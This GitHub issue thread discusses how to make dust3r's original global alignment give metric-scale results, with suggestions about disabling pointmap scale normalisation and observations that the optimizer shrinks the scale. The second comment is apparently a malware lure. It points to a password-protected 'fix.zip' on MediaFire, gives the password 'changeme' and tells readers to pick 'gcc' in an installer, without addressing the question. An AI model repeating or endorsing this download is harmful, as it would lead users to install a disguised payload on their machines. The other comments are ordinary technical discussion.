### ISSUE TITLE
 Modify original dust3r global alignment to produce metric results

### ISSUE THREAD

**Issue by justacar** [naver/mast3r#34]
Hi,
I have trained my own version of dust3r that could produces pointmaps with metric scale. However, I've noticed that the pose produced by demo_dust3r_ga.py after global alignment is not metric, while the new sparse global alignment can produce metric results. This is also mentioned in sparse_ga.py:
```
# security! optimization is always trying to crush the scale down
sizes = torch.cat(log_sizes).exp()
global_scaling = 1 / sizes.min()
```    
The new sparse global alignment is significantly different from the original version and is designed to work with mast3r, which requires matching and descriptor information not provided in dust3r output.

I'm looking for a simple way to modify the original global alignment to output metric results. What are the minimal changes needed to achieve this?

Thanks!

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ljjTYJR** [comment]
It is intuitive that the scale of the scene is smaller, the alignment loss will be smaller.
I think one simple way to fix the scale is to fix one prediction during the training, for example, make some frame's prediction non-optimizable in the alignment to remove the scale freedom.

**Comment by justacar** [comment]
Thank you for your suggestion. After reviewing the optimizer.py file, I found that it works in my case by simply setting self.norm_pw_scale to False.  https://github.com/naver/dust3r/blob/9869e71f9165aa53c53ec0979cea1122a569ade4/dust3r/cloud_opt/optimizer.py#L66-L81

**Comment by ljjTYJR** [comment]
> Thank you for your suggestion. After reviewing the optimizer.py file, I found that it works in my case by simply setting self.norm_pw_scale to False. https://github.com/naver/dust3r/blob/9869e71f9165aa53c53ec0979cea1122a569ade4/dust3r/cloud_opt/optimizer.py#L66-L81

But I do not think it will always produce metric-level scene reconstruction, as scale is one of the optimizable parameter, it tend to produce smaller scale such that the loss is smaller, isn't it?

**Comment by justacar** [comment]
You're right. I compared the original depthmap and the depthmap after alignment.  As I increased the niter, the scale did decrease.
